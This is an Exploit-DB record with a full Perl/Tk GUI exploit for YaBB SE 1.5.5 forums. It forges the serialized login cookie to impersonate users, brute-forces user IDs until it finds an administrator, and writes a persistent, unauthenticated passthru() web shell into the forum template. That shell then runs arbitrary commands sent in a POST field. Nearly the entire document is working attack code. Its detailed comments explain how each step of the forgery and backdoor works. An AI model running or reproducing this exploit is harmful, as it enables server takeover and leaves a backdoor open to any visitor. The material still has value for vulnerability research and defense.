YaBB SE <= 1.5.5 - Remote Command Execution Exploit

2008-01-22T00:00:00
ID EDB-ID:4963
Type exploitdb
Reporter RST/GHC
Modified 2008-01-22T00:00:00

Description

YaBB SE <= 1.5.5 Remote Command Execution Exploit (web application, PHP platform). The script forges the forum's serialized login cookie to act as a chosen user ID, walks IDs upward until one whose pages show the admin link is found, then saves a PHP passthru() backdoor through the admin template editor (action=modtemp2) and drives it with a POST parameter. Note that the backdoor is written into the forum template itself and is reachable without authentication, so it persists until someone removes it.

                                        
                                            #!/usr/bin/perl

## YaBB SE version <= 1.5.5 commands execution exploit by RST/GHC
## GUI version =)))
##  
##        THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
##                   KEEP IT PRIVATE
##
## (c)oded by 1dt.w0lf
## http://rst.void.ru
## http://ghc.ru


use Tk;
use Tk::Menu;
use LWP::UserAgent;

# ---- Script state shared with the Tk widgets ----------------------------
# These are package globals on purpose: Dialog::ui hands references to them
# to the Entry widgets (-textvariable), and the worker subs read them back.
# NOTE(review): the script runs without 'use strict'/'use warnings'; turning
# them on would require declaring every shared global below with 'our'.
$top = MainWindow->new();
$top->title("r57yabbse155ceGUI");
$top->resizable(0, 0);

$url         = 'http://server/forum/index.php';   # "PATH TO INDEX.PHP" entry
$id          = '1';                               # first user ID to try ("1 default for admin")
$cookie_name = 'YaBBSE155';                       # forum login cookie name, default for 1.5.5
$cmd         = 'ls -la; id; uname -a;';           # command handed to passthru() on the target

# The first button toggles between starting the ID scan and stopping it: the
# Tk button is given \$found_admin_id, so reassigning this scalar swaps the
# action, and \$_button_1_text relabels it.
$_button_1_text = 'Found admin ID';
$found_admin_id = \&found_admin_id_start;
$stop           = 0;

# Plain LWP client with default settings - every request therefore carries
# LWP's stock "libwww-perl/<version>" User-Agent, a trivial indicator for
# anyone reviewing the target's access logs.
$xpl = LWP::UserAgent->new() or die;

Dialog::ui($top);

# Leftover from the GUI-builder template: no Dialog::run is defined here.
Dialog::run() if defined &Dialog::run;

Tk::MainLoop();

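# Discover the name of the forum's login cookie and store it in $cookie_name
# (which feeds the COOKIE NAME entry through its textvariable).
# Reads: $xpl, $url, $_text_1.  Writes: $res, $cookie_name.
sub get_cookie_name
 {
 $_text_1->delete("0.0", 'end');
 $_text_1->insert('end', "[~] Try get cookie name\n");
 # Hit the logout action with a throwaway PHP session id. Logging out is
 # expected to clear the forum's login cookie, and PHP's setcookie() emits
 # "name=deleted" when clearing a cookie, which reveals the name in use.
 # 'sesc' appears to be a session code the action checks - TODO confirm
 # against the YaBB SE source.
 $res = $xpl->get($url . '?action=logout&sesc=1', 'Cookie' => 'PHPSESSID=1');
 if (!$res->is_success) { connect_error(); return; }

 # Inspect the Set-Cookie headers themselves rather than regexing the whole
 # serialized response: a response may carry several of them, and the name
 # is the part before the first '='.
 my $found = '';
 foreach my $set_cookie ($res->header('Set-Cookie')) {
   if ($set_cookie =~ /^([^=;\s]+)=deleted;/) { $found = $1; last; }
 }
 if ($found ne '') {
   $_text_1->insert('end', "[+] COOKIE NAME: " . $found . "\n");
   $cookie_name = $found;
 }
 else {
   $_text_1->insert('end', "[-] Can't get cookie name\n");
 }
 }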

# Button action while the ID scan is running. The scan loop in
# found_admin_id_start polls $stop and pumps Tk events via $top->update()
# inside login(), which is what lets this callback run at all.
sub found_admin_id_stop
 {
 # Put the button back into its "start" state, then raise the flag.
 $_button_1_text = 'Found admin ID';
 $found_admin_id = \&found_admin_id_start;
 $stop = 1;
 }

# Scan user IDs upward from $id, one HTTP request each, until one is found
# whose pages show both the profile link (logged in) and the admin link.
# Reads/writes the globals $id, $stop, $error, $success, $_button_1_text,
# $found_admin_id, $_text_1.  The scan has no upper bound: it ends only on
# success, on a transport error (login() sets $error) or when the user
# presses Stop, which is serviced during $top->update() in login().
sub found_admin_id_start
 {
 # Flip the button into its "Stop" state (label and action are both read
 # by the Tk button through references).
 $_button_1_text = '     Stop     ';
 $found_admin_id = \&found_admin_id_stop;
 $_text_1->delete("0.0", 'end');
 $_text_1->insert('end', "[~] Try found admin ID\n");
 $success = 0;
 $error   = 0;
 SCAN: while (!$stop) {
   if (login()) {
     # user_admin() is only meaningful on a page that shows a logged-in user.
     if (user_exist() && user_admin()) { $success = 1; last SCAN; }
   }
   last SCAN if $error;
   $id++;
 }
 $_text_1->insert('end', "[+] ADMIN ID: " . $id . "\n") if $success;
 # Restore the button and clear the stop flag for the next run.
 $_button_1_text = 'Found admin ID';
 $found_admin_id = \&found_admin_id_start;
 $stop = 0;
 }

# Build the forum login cookie "<name>=<value>" from $cookie_name and $id.
# The value is a URL-encoded PHP serialize() array:
#   a:2:{i:0;s:N:"ID";i:1;b:1;}
# i.e. element 0 = the user ID as an N-byte string, element 1 = true.
# Nothing else (no password hash, no signature) is part of it, so choosing
# $id is evidently all that is needed to be treated as that user.
sub create_cookie
 {
 return sprintf('%s=a%%3A2%%3A%%7Bi%%3A0%%3Bs%%3A%d%%3A%%22%s%%22%%3Bi%%3A1%%3Bb%%3A1%%3B%%7D',
                $cookie_name, length($id), $id);
 }

# Fetch the forum index presenting only the forged cookie for the current
# $id; the response is left in $res for user_exist()/user_admin().
# Returns 1 when the request succeeded at the HTTP level (this says nothing
# yet about whether the forum accepted the login), 0 on a transport error,
# in which case $error is set so the scan loop stops.
sub login
 {
 $_text_1->insert('end', "[~] Try login with USER ID: " . $id . "\n");
 # Let Tk service pending events - this is what keeps the window (and the
 # Stop button) responsive while found_admin_id_start loops.
 $top->update();
 $res = $xpl->get($url, 'Cookie' => create_cookie());
 return 1 if $res->is_success;
 $error = 1;
 connect_error();
 return 0;
 }

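# Decide from the page login() just fetched ($res) whether the forged
# cookie was accepted. A link to the profile action is taken as the sign
# of a logged-in page - presumably the forum only renders it then.
# Returns 1 when logged in, 0 otherwise; logs the result to the text pane.
sub user_exist
 {
 my $logged_in = ($res->as_string =~ /action=profile/) ? 1 : 0;
 $_text_1->insert('end', $logged_in ? "[+] Successfully logged in\n"
                                    : "[-] User with this ID not exists\n");
 # Refresh the window so the line is visible while the scan keeps looping
 # (the call must come before the return or it never runs).
 $top->update();
 return $logged_in;
 }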
 
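# Decide from the last fetched page ($res) whether the logged-in user has
# admin rights, using the presence of a link to the admin action as the
# indicator. Returns 1 for admin, 0 otherwise; logs the result.
sub user_admin
 {
 my $is_admin = ($res->as_string =~ /action=admin/) ? 1 : 0;
 $_text_1->insert('end', $is_admin ? "[+] This user have admin rights\n"
                                   : "[-] This user don't have admin rights\n");
 # Refresh the window so the line is visible while the scan keeps looping
 # (the call must come before the return or it never runs).
 $top->update();
 return $is_admin;
 }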

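# Install the command backdoor: open the admin template editor with the
# forged admin cookie, prepend a PHP passthru() stub to the current template
# and save it back. Reads $xpl, $url, $_text_1; writes $res.
#
# What this leaves behind: the stub is written into the forum template, i.e.
# into every page the forum renders, and it runs for ANY visitor who POSTs
# an RSTGHC field - no cookie or login involved. It is a persistent,
# unauthenticated web shell until someone removes it (grep the templates for
# RST_GHC_TEMPLATE).
sub create_shell
 {
 $_text_1->delete("0.0", 'end');
 $_text_1->insert('end', "[~] Try create shell\n");
 $res = $xpl->get($url . '?action=modtemp', 'Cookie' => create_cookie());
 if (!$res->is_success) { connect_error(); return; }

 $_text_1->insert('end', "[~] Try get & edit template\n");
 # Scrape the editor form: the hidden 'sc' field (sent back as a form field
 # and as PHPSESSID - presumably a per-session form token; TODO confirm
 # against the YaBB SE source) and the current template text from the
 # <textarea name="template"> element.
 my $template    = '';
 my $sc          = '';
 my $already     = 0;
 my $in_textarea = 0;
 LINE: foreach my $line (split /\n/, $res->content()) {
   if ($line =~ /input type="hidden" name="sc" value="([^"]*)"/) { $sc = $1; }
   # Marker already present: a previous run installed the stub, so do not
   # stack a second copy.
   if ($line =~ /RST_GHC_TEMPLATE/) { $already = 1; last LINE; }
   if ($line =~ /(.*)<\/textarea>/) { $template .= $1 . "\n"; $in_textarea = 0; }
   $template .= $line . "\n" if $in_textarea;
   if ($line =~ /<textarea[^>]*name="template"[^>]*>(.*)/) { $template .= $1 . "\n"; $in_textarea = 1; }
 }

 if ($already) {
   $_text_1->insert('end', "[!] Template already modified\n[+] Skip Template editing\n");
 }
 else {
   $_text_1->insert('end', "[~] Edit Template\n");
   # The stub echoes RST_GHC_TEMPLATE around the passthru() output so that
   # execute_command() can cut the output out of the surrounding page.
   # It uses the short open tag "<?", so it only runs where the target's
   # PHP has short_open_tag enabled.
   my $backdoor = '<? if(isset($_POST[\'RSTGHC\'])) { echo "RST_GHC_TEMPLATE"; passthru($_POST[\'RSTGHC\']); echo "RST_GHC_TEMPLATE"; } ?>';

   # The textarea holds the template HTML-escaped; undo that before saving
   # or the escaped form would be stored. &amp; is decoded after &lt;/&gt;/
   # &quot; so that double-escaped sequences such as &amp;lt; do not turn
   # into a bare '<'.
   $template =~ s/&lt;/</g;
   $template =~ s/&gt;/>/g;
   $template =~ s/&quot;/"/g;
   $template =~ s/&amp;/&/g;
   $template =~ s/&nbsp;/ /g;

   $res = $xpl->post($url,
                     [
                     'action'   => 'modtemp2',
                     'submit'   => 'Save',
                     'template' => $backdoor . $template,
                     'sc'       => $sc,
                     ],
                     'Cookie' => 'PHPSESSID=' . $sc . ';' . create_cookie());
   # Do not claim success unless the save request itself went through.
   if (!$res->is_success) { connect_error(); return; }
 }
 $_text_1->insert('end', "[+] DONE!\n[!] Now you can execute commands\n");
 }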

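# Run $cmd through the backdoor installed by create_shell() and print its
# output in the text pane. Reads $xpl, $url, $cmd, $_text_1; writes $res.
# Only the RSTGHC POST field is sent - no cookie, because the injected
# template code runs for any visitor.
sub execute_command
 {
 $_text_1->delete("0.0", 'end');
 $_text_1->insert('end', "[~] Try execute command\n");
 $res = $xpl->post($url, [ 'RSTGHC' => $cmd ]);
 if (!$res->is_success) { connect_error(); return; }

 # The passthru() output sits between the two RST_GHC_TEMPLATE markers the
 # stub echoes; everything before/after is the normal forum page.
 my @parts = split("RST_GHC_TEMPLATE", $res->content);
 if (@parts < 2) {
   # No marker at all: the stub is not (or no longer) in the template, so
   # there is no output to show rather than an undef to insert.
   $_text_1->insert('end', "[-] Marker RST_GHC_TEMPLATE not found in response - run 'Create shell' first\n");
   return;
 }
 $_text_1->insert('end', $parts[1]);
 $_text_1->insert('end', "[+] EOF\n");
 }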
 
# Log the HTTP status line of the last response ($res, set by every request
# helper) to the text pane.
sub connect_error
 {
 my $status = $res->status_line;
 $_text_1->insert('end', "[-] Error: $status\n");
 }

# Build the whole window inside $root (the MainWindow). Widgets are stored in
# the package globals the worker subs use ($_text_1 is the log pane); the
# entries are bound to $url/$id/$cookie_name/$cmd through -textvariable, so
# typing into them changes those globals directly.
sub Dialog::ui {
    our ($root) = @_;

    # Shared styling: one font for every text-bearing widget, one relief for
    # entries and buttons.
    my $mono   = '{Courier New} 8';
    my $relief = 'groove';

    # --- Widget construction ---------------------------------------------
    $_frame_6  = $root->Frame();
    $_frame_12 = $root->Frame();
    $_frame_13 = $root->Frame();

    $_label_1 = $root->Label(-font => 'Webdings 24 bold', -text => "!");
    $_label_2 = $root->Label(
        -activebackground => "#ff0000",
        -activeforeground => "#ff0000",
        -font             => $mono,
        -foreground       => "#ff0000",
        -text             => "YaBB SE <= 1.5.5 command execution exploit by RST/GHC",
    );
    $_label_5 = $root->Label(-font => $mono, -text => "PATH TO INDEX.PHP:");
    $_label_6 = $root->Label(-font => $mono, -text => "ADMIN ID:");

    $_entry_4 = $root->Entry(-font => $mono, -relief => $relief, -textvariable => \$url, -width => 65);
    $_entry_7 = $root->Entry(-font => $mono, -relief => $relief, -textvariable => \$id);
    our ($_entry_8) = $root->Entry(-font => $mono, -relief => $relief, -textvariable => \$cookie_name);

    $_label_8  = $root->Label(-font => $mono, -text => "COOKIE NAME:");
    $_button_2 = $root->Button(-font => $mono, -height => 1, -relief => $relief, -text => "Get cookie name");
    $_button_3 = $root->Button(-font => $mono, -relief => $relief, -text => "Create shell");
    $_label_10 = $root->Label(-font => $mono, -text => "COMMAND FOR EXECUTE:");
    $_button_6 = $root->Button(-font => $mono, -relief => $relief, -text => "Execute command");
    $_entry_11 = $root->Entry(-font => $mono, -relief => $relief, -textvariable => \$cmd, -width => 65);

    # Log pane written by every worker sub.
    $_text_1 = $root->Scrolled(
        'Text',
        -scrollbars => 'e',
        -wrap       => 'word',
        -font       => $mono,
        -height     => 0,
        -relief     => $relief,
        -width      => 0,
    );

    # Label is read from $_button_1_text so the scan can relabel it "Stop".
    $_button_1 = $root->Button(-font => $mono, -relief => $relief, -textvariable => \$_button_1_text);

    $_label_3 = $root->Label(-anchor => "nw", -compound => "left", -font => $mono, -text => "* 1 default for admin");
    $_label_4 = $root->Label(-anchor => "w", -font => $mono, -justify => "left", -text => "* YaBBSE155 default for version 1.5.5");
    $_label_7 = $root->Label(-font => $mono, -text => "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru");

    # --- Button actions --------------------------------------------------
    $_button_2->configure(-command => \&get_cookie_name);
    $_button_3->configure(-command => \&create_shell);
    $_button_6->configure(-command => \&execute_command);
    # A reference to the scalar, not a code ref: found_admin_id_start/_stop
    # reassign $found_admin_id to swap the button between scan and stop.
    $_button_1->configure(-command => \$found_admin_id);

    # --- Geometry: [widget, container, column, row, columnspan, sticky] --
    # Every cell uses rowspan 1 and zero internal/external padding.
    my @layout = (
        [ $_frame_6,  $root,      3, 3, 1, "ew"   ],
        [ $_frame_12, $root,      1, 3, 2, "ne"   ],
        [ $_frame_13, $root,      3, 4, 1, ""     ],
        [ $_label_1,  $root,      2, 1, 1, ""     ],
        [ $_label_2,  $root,      3, 1, 1, ""     ],
        [ $_label_5,  $root,      1, 2, 2, "ne"   ],
        [ $_label_6,  $_frame_12, 1, 1, 1, "e"    ],
        [ $_entry_4,  $root,      3, 2, 1, "w"    ],
        [ $_entry_7,  $_frame_6,  1, 1, 1, "w"    ],
        [ $_entry_8,  $_frame_6,  1, 2, 1, "nw"   ],
        [ $_label_8,  $_frame_12, 1, 2, 1, "se"   ],
        [ $_button_2, $_frame_13, 1, 1, 1, "e"    ],
        [ $_button_3, $_frame_13, 3, 1, 1, "e"    ],
        [ $_label_10, $_frame_12, 1, 3, 1, "se"   ],
        [ $_button_6, $_frame_13, 4, 1, 1, "e"    ],
        [ $_entry_11, $_frame_6,  1, 3, 2, "nw"   ],
        [ $_text_1,   $root,      1, 5, 3, "news" ],
        [ $_button_1, $_frame_13, 2, 1, 1, ""     ],
        [ $_label_3,  $_frame_6,  2, 1, 1, "ew"   ],
        [ $_label_4,  $_frame_6,  2, 2, 1, "ew"   ],
        [ $_label_7,  $root,      1, 6, 3, "nw"   ],
    );
    foreach my $cell (@layout) {
        my ($widget, $container, $column, $row, $span, $sticky) = @$cell;
        $widget->grid(
            -in         => $container,
            -column     => $column,
            -row        => $row,
            -columnspan => $span,
            -rowspan    => 1,
            -ipadx      => 0,
            -ipady      => 0,
            -padx       => 0,
            -pady       => 0,
            -sticky     => $sticky,
        );
    }

    # --- Resize behaviour: per container, [weight, minsize] for rows 1..n
    # and columns 1..n (all with -pad 0). Only the log row (root row 5) and
    # the middle column of $root / second column of $_frame_6 stretch.
    my @resize = (
        [ $root,      rows => [ [0, 40], [0, 12], [0, 2], [0, 40], [1, 250], [0, 27] ],
                      cols => [ [0, 5], [1, 54], [0, 112] ] ],
        [ $_frame_12, rows => [ [0, 2], [0, 2], [0, 2] ],
                      cols => [ [0, 40] ] ],
        [ $_frame_13, rows => [ [0, 2] ],
                      cols => [ [0, 5], [0, 40], [0, 40], [0, 40] ] ],
        [ $_frame_6,  rows => [ [0, 2], [0, 11], [0, 2] ],
                      cols => [ [0, 2], [1, 54] ] ],
    );
    foreach my $spec (@resize) {
        my ($container, %axes) = @$spec;
        my $index = 1;
        foreach my $row (@{ $axes{rows} }) {
            $container->gridRowconfigure($index++, -weight => $row->[0], -minsize => $row->[1], -pad => 0);
        }
        $index = 1;
        foreach my $col (@{ $axes{cols} }) {
            $container->gridColumnconfigure($index++, -weight => $col->[0], -minsize => $col->[1], -pad => 0);
        }
    }
}

1;

# milw0rm.com [2008-01-22]